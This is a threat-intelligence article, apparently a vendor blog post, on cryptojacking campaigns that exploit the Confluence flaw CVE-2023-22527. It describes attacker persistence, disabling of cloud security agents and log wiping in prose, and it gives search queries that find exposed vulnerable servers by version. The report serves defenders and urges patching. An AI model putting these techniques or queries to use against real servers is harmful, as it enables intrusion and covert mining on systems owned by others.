According to a recent threat report from cybersecurity firm Trend Micro, there is a rise in cryptojacking attacks exploiting a critical vulnerability, CVE-2023-22527, in the global collaboration and documentation platform Atlassian Confluence. This vulnerability has a CVSS score of 10.0 and a severity rating of ‘Critical’ and allows remote code execution (RCE) attacks on the ‘Confluence Data Center’ and ‘Confluence Server’. In this article, we will examine the cryptojacking attack method that mines cryptocurrency by exploiting the RCE vulnerability in Confluence, along with the threat-hunting method using the CTI search engine.
CVE-2023-22527 Exploit Cases and Cryptojacking Attack Methods
According to the Trend Micro report, cryptojacking attacks exploiting the CVE-2023-22527 vulnerability have surged since June, following Atlassian’s disclosure on January 16, 2024. Confluence versions affected by the CVE-2023-22527 vulnerability are as follows:
- 8.0.x
- 8.1.x
- 8.2.x
- 8.3.x
- 8.4.x
- 8.5.0-8.5.3
Distribution of XMRig Miners Through ELF File Payloads
One of the main attackers was observed executing the attack by deploying an XMRig miner with an ELF file payload.
Automation of Mining Through Secure Shell and Data from Shell Scripts
The shell script that another attacker distributed was intricately designed to allow mining from all accessible endpoints via secure shell. The script terminated all processes executed in the */tmp/* directory and cron jobs. Afterwards, it added a new cron job that checks the C2 (Control and Command) server connection every five minutes.
The attacker also used the localgo function to collect the IP address, bash records, and SSH configuration, then automated the cryptocurrency mining on a different host using SSH. The crontab jobs were added to various locations (init.d, cron.hourly, cron.d) under different names (whoami, nginx, apache) to maintain server access. der function removed Alibaba Cloud Shield security service and performed IP blocking to eliminate Tencent Cloud mirror under certain conditions.
After confirming that the cloud monitoring and security services had been terminated or deleted, the attacker first ended the shell script process that exploited CVE-2023-22527 before initiating cryptocurrency mining. Prior to mining, the attacker used functions in solr.sh to disable additional security mechanisms that were absent in the shell script exploiting CVE-2023-22527. Finally, they removed log files and bash history to erase any traces of the breach.
Hunting for CVE-2023-22527 Threats Using Threat Intelligence Search Engine
The product filter in Criminal IP, a threat-hunting tool that searches for Internet-connected assets, allows users to search for servers running specific products. Below is a link to queries and search results related to the Atlassian Confluence server.
As of September 24, 2024, a total of 1,035,877 results were identified.
Search Query: product: Confluence
Not all identified Confluence servers are affected by the CVE-2023-22527 vulnerability; some may run unaffected versions. However, caution is still required because the external exposure of the Confluence server by itself can be a threat to numerous known and unknown vulnerabilities.
Adding a product_version filter to the existing product: Confluence query allows you to search for a specific version of a Confluence server. The affected Confluence search queries for version 8.5.1 are as follows:
Search Query: product: Confluence product_version:8.5.1
A total of 176,055 instances of Confluence version 8.5.1 were identified through the search. A look at the IP address report of one of the servers shows that Confluence version 8.5.1 is running on TCP port 9078. In particular, it was found to have a well-known Confluence vulnerability, CVE-2023-22515.
As shown in this case, applications and devices exposed to the internet that are not updated with the latest patches are not only targets for cryptojacking but also for more severe cyber attacks, such as data breaches and system takeovers. Therefore, timely updates and security patches are imperative. Security and infrastructure personnel within organizations should regularly check for open vulnerable ports or neglected assets.
For further information, you can refer to Criminal IP Analysis Report on Zero-Day Vulnerability in Atlassian Confluence and What Is Cryptojacking: Examples and How to Prevent It?.
This report is based on data from Criminal IP, a Cyber Threat Intelligence search engine. Sign up for a free Criminal IP account today to explore the search results mentioned in the report and delve into comprehensive threat intelligence.
Source: Criminal IP (https://www.criminalip.io)
Related Articles: